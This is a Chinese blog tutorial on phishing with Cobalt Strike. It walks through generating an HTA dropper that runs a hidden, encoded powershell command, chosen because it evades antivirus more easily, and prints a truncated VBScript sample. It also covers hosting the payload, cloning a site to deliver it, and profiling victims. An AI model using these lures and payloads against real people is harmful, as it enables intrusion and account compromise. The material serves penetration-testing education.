Cobalt Strike教程-第五节 钓鱼

释放双眼,带上耳机,听听看~!

Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。

Cobalt Strike是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,socket代理,提权,钓鱼等。除去自身功能外,Cobalt Strike还利用了Metasploit和Mimikatz等其他知名工具的功能。

0x00 简介

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件

0x01 HTML Application生成

生成方式 Attack>Packages>HTML Application

这里他给我们提供了3种生成方式 exe,powershell,vba。其中VBA方法需要目标系统上的Microsoft Office,在系统支持的情况下我们一般选择powershell,因为这种方式更加容易免杀。通常我们结合host File(文件下载功能) 来实行钓鱼。 Cobalt Strike  这里我们选择 powershell 生成 一个HTA

<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZ", 0, true
	End Function

	var_func
	self.close
script>

可以看到其实就是一个 powershell命令 所以我们免杀做起来想多简单一点。

0x02 HTML Application利用

Host file

这里我们利用CS的 host file功能 来联动一下 Cobalt Strike

生成后的连接 发给目标打开(怎么让目标打开也是一门艺术) 注意的是这里生成后你改了本地的evil.hta文件他不会自动更新 需要点击Attack>Web Drive-by>Manage 把这个服务kill掉然后从新生成。

Cobalt Strike  目标点击后上线, 这里我就不演示其他2种了基本用不到。

Clone site

CS还是非常贴心的给我们准备一个功能 网站克隆 ,在我们了解到内网其他网站时还是非常有用的。

使用 Attack>Web Drive-by>Clone Site

Cobalt Strike  我这里就直接克隆个百度,然后attack 点击就可以加载 我们刚刚在host file里面的文件 很方便。

Cobalt Strike

目标用户显示

0x04 System Profiler 信息收集

讲到钓鱼 不得不讲下System Profiler这个功能 他能收集一下用户的信息然后重定向,这个有利于我们判断目标环境然后,准备我们的payload,当然也可以自己写JavaScript。

使用 Attack>Web Drive-by >System Profiler

Cobalt Strike

然后 发送给目标 然后我们在菜单栏 View>Applications 可以看到我们成功获取的各种信息 Cobalt Strike

0x05 文末

在内网中钓鱼有时候是很有效的,但是也是很容易暴露的一种,钓鱼最好测试好各种payload,这东西发出去就没后悔药了,当然有0day就更好了(用时2小时)

本文如有错误,请及时提醒,以免误导他人

@404
aleenzz
公众号:aleenzz

人已赞赏
安全工具

Cobalt Strike教程-第四节 DNS Beacon

2019-11-11 14:19:01

安全工具

Cobalt Strike教程-第六节 钓鱼 MSF联动钓鱼

2019-11-11 14:23:00

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索